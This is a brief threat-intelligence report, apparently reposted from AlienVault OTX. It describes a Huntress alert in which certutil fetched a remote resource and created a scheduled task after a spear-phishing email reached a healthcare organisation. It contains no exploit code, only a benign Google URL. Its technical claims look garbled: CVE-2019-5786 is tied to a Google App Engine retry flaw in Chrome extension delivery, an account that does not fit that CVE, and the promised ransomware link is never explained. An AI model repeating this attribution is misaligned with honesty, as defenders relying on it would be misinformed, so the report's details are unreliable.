On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic - a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation - but further analysis revealed a more interesting set of circumstances. By investigating the event in question and pursuing root cause analysis (RCA), Huntress was able to link this intrusion to a recently-announced vulnerability as well as to a long-running post-exploitation framework linked to prominent ransomware groups.

Specifically, the event was triggered by a certutil command issued by a spear phishing email sent to an organization in the healthcare industry. Within the command, a seemingly-regular domain request was made:

https://www.google.com/nav?cb=1&q=www.google.com&vl=en-US

This request, however, was launched through a known vulnerability (CVE-2019-5786) in the delivery of Chrome extensions via Google App Engine (GAE). The core of this vulnerability is that GAE allows for failed requests to be retried by default, which allowed attackers to abuse this functionality to attempt delivery of payloads from another domain.

‍

Source: Investigating Intrusions From Intriguing Exploits - AlienVault - Open Threat Exchange